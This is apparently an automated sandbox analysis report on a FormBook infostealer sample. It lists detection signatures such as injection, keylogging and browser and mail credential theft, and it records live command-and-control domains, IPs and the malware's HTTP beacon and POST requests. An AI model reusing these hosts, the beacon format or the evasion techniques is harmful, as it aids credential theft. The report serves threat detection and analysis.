Windows Analysis Report
rPO2025KTI-1059.exe

Overview

General Information

Sample name: rPO2025KTI-1059.exe
Analysis ID: 1650882
MD5: d0d4ac67a31810c43fb2f85f67a8b6f4
SHA1: 58bf2ed6745a10acdad1e48be485c2b94d0c07da
SHA256: 36b91cc1daa2bf80961d885be58addc49aecb83823f72caf1185ade288c2b7bf
Tags: exeuser-Porcupine
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: rPO2025KTI-1059.exe Virustotal: Detection: 50% Perma Link
Source: rPO2025KTI-1059.exe ReversingLabs: Detection: 41%
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2477977050.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1977517644.0000000007FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2480569793.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1973374982.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2480573811.0000000002C20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2479760210.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1974135087.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2480693049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submited Sample Neural Call Log Analysis: 80.4%
Source: rPO2025KTI-1059.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP source: rPO2025KTI-1059.exe, 00000000.00000003.1233270608.0000000004130000.00000004.00001000.00020000.00000000.sdmp, rPO2025KTI-1059.exe, 00000000.00000003.1236411873.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1882227177.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1973737395.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1973737395.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1880417121.0000000003800000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2480956841.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1973800098.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1976565386.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2480956841.0000000003960000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: rPO2025KTI-1059.exe, 00000000.00000003.1233270608.0000000004130000.00000004.00001000.00020000.00000000.sdmp, rPO2025KTI-1059.exe, 00000000.00000003.1236411873.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1882227177.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1973737395.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1973737395.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1880417121.0000000003800000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2480956841.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1973800098.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1976565386.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2480956841.0000000003960000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: sfc.pdb source: svchost.exe, 00000001.00000003.1941555692.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1941649900.0000000003624000.00000004.00000020.00020000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2479552228.00000000010BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000001.00000003.1941555692.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1941649900.0000000003624000.00000004.00000020.00020000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2479552228.00000000010BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: sfc.exe, 0000000C.00000002.2478431645.0000000003304000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2481556246.0000000003F8C000.00000004.10000000.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000000.2048307666.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2275649544.000000000318C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: sfc.exe, 0000000C.00000002.2478431645.0000000003304000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2481556246.0000000003F8C000.00000004.10000000.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000000.2048307666.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2275649544.000000000318C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2479293448.0000000000FCF000.00000002.00000001.01000000.00000005.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000002.2480847853.0000000000FCF000.00000002.00000001.01000000.00000005.sdmp
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0079445A
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079C6D1 FindFirstFileW,FindClose, 0_2_0079C6D1
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0079C75C
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0079EF95
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0079F0F2
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0079F3F3
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_007937EF
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00793B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00793B12
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0079BCBC

Networking

barindex
Source: DNS query: www.play-venom-rush.xyz
Source: DNS query: www.hypend.xyz
Source: Joe Sandbox View IP Address: 209.74.79.41 209.74.79.41
Source: Joe Sandbox View IP Address: 52.223.13.41 52.223.13.41
Source: Joe Sandbox View IP Address: 172.64.80.1 172.64.80.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007A22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_007A22EE
Source: global traffic HTTP traffic detected: GET /8gml/?bp3L7N0=uagn24tKD9XwqPketrL8vPAAyfhmu7pATFdWjn4YGNyEFoo5H0iTa23WeYKqrGs+/MsKrZvXmlVRnmZA8Xnd/jKaPpngkZRqMSkJ9VYmBlbKsStinMnI1pA=&SPxhT=hn5X HTTP/1.1Host: www.hlkjhu.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux armv7l; ru-RU; rv:1.9.2.3pre) Gecko/20100723 Firefox/3.5 Maemo Browser 1.7.4.8 RX-51 N900
Source: global traffic HTTP traffic detected: GET /yt8q/?bp3L7N0=WRKjTn0dll6Qz3UyE21xyejj49mCaCQ97raCxfAySAXOx/ipnyZtE+tC+uiKhs02kc3wz6Sff6xAEylRtbwChhdQGjE6qMic59Cp4/1xZp7iacP8ILZzcp8=&SPxhT=hn5X HTTP/1.1Host: www.play-venom-rush.xyzAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux armv7l; ru-RU; rv:1.9.2.3pre) Gecko/20100723 Firefox/3.5 Maemo Browser 1.7.4.8 RX-51 N900
Source: global traffic HTTP traffic detected: GET /tekh/?SPxhT=hn5X&bp3L7N0=z5gEihOGDB7WnuLTAQO9muKZThSiJ7F9a5OrXridUNi/TfNTZzeYN00B2pODk5SFuZ2ppKxBKG8kLwcZQB+wXl8A+kxFIWVn/epyP/VxgVdiOj9y8RN5pJo= HTTP/1.1Host: www.hypend.xyzAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux armv7l; ru-RU; rv:1.9.2.3pre) Gecko/20100723 Firefox/3.5 Maemo Browser 1.7.4.8 RX-51 N900
Source: global traffic DNS traffic detected: DNS query: www.hlkjhu.online
Source: global traffic DNS traffic detected: DNS query: www.play-venom-rush.xyz
Source: global traffic DNS traffic detected: DNS query: www.hypend.xyz
Source: unknown HTTP traffic detected: POST /yt8q/ HTTP/1.1Host: www.play-venom-rush.xyzAccept: */*Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 204Origin: http://www.play-venom-rush.xyzReferer: http://www.play-venom-rush.xyz/yt8q/User-Agent: Mozilla/5.0 (X11; U; Linux armv7l; ru-RU; rv:1.9.2.3pre) Gecko/20100723 Firefox/3.5 Maemo Browser 1.7.4.8 RX-51 N900Data Raw: 62 70 33 4c 37 4e 30 3d 62 54 69 44 51 51 55 4d 6f 42 4f 30 36 77 77 7a 55 32 74 59 34 73 6a 41 38 39 69 2b 65 41 30 4b 37 6f 61 43 78 50 63 6f 59 68 54 78 30 59 47 33 32 6a 6c 6f 4a 75 6c 7a 33 4c 65 45 6e 36 59 2f 74 74 54 4c 6a 61 47 65 47 36 4a 6e 48 67 4a 37 76 72 45 30 6e 68 59 6c 49 6a 55 37 32 4b 4b 54 77 63 53 4d 36 70 77 48 64 72 6a 41 51 37 6e 58 49 74 4e 51 49 64 4b 57 7a 35 39 67 4f 36 79 77 33 4f 61 68 71 30 47 4b 61 58 38 2f 67 4c 31 34 59 74 73 4a 2f 59 57 41 43 64 4f 4e 67 73 47 36 76 64 59 6e 45 42 76 49 37 57 64 58 55 55 70 75 55 73 30 71 74 4e 65 50 74 52 62 53 4c 44 48 64 76 51 3d 3d Data Ascii: bp3L7N0=bTiDQQUMoBO06wwzU2tY4sjA89i+eA0K7oaCxPcoYhTx0YG32jloJulz3LeEn6Y/ttTLjaGeG6JnHgJ7vrE0nhYlIjU72KKTwcSM6pwHdrjAQ7nXItNQIdKWz59gO6yw3Oahq0GKaX8/gL14YtsJ/YWACdONgsG6vdYnEBvI7WdXUUpuUs0qtNePtRbSLDHdvQ==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 05:33:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Fri, 28 Mar 2025 05:33:09 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oxYe2U3rckLmTFzK0C21x6wiKWa5icGogQW34Z7GAxN3tFed0JRDt5HbJgt9n5%2BaOkuRbFfP72pZgf4%2B2ver%2BiFvWbKtIO9MzkQlDLwj8ZfmJk1HjnlVIa4vh%2Foi80qC9bakVluW%2F5g7ng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9274c0451e2d424b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=83951&min_rtt=83951&rtt_var=41975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=666&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 05:33:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Fri, 28 Mar 2025 05:33:12 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tTbzMvri4B02uPg5BtgNcWcm5sGVsilIH%2B12F%2F9qarRxeyF4xi1k2epx7Iy51mFSFA%2BhbpMds1sJJLX%2B5H%2BsozNAom0nK7rpw1J3ZFfG3EFzecnsM%2FT9pNhik%2BMy%2FnXFwgtxZcdvDKaYMQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9274c0559c9bda80-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=84033&min_rtt=84033&rtt_var=42016&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=686&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 05:33:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Fri, 28 Mar 2025 05:33:14 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vXGF2VMFb4yKboWSOC%2FrWJsNWxNLxwKi%2Bkwr4ymjR3GkLOFDSj7ylDmx4L3%2Bv%2B5zZr72jYEVQfzsGXaONrvlJ3I1baiA%2FoQT4axjv45qCnCRW99LjSXtHQmKHJef%2FTFD7kqdj8LDbnkIMQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9274c065fd2c7d1a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=84168&min_rtt=84168&rtt_var=42084&sent=2&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=6943&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 05:33:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Fri, 28 Mar 2025 05:33:17 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gPtIruO8jYYQEF%2FhXkcVaZ64yU%2FIr1yFj2ScOe5FK0yZzuqxIJmQcnWUpdJkBhkozNi7G%2FgUcpQYzX1x2832Kbb67gv7WplpNg2cjYHPlZpPouUYQHf5y9gumjTmuByixjrf3PLyYwONQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9274c0765aa5917b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=84796&min_rtt=84796&rtt_var=42398&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=383&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>ng
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 05:33:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 05:33:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 05:33:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
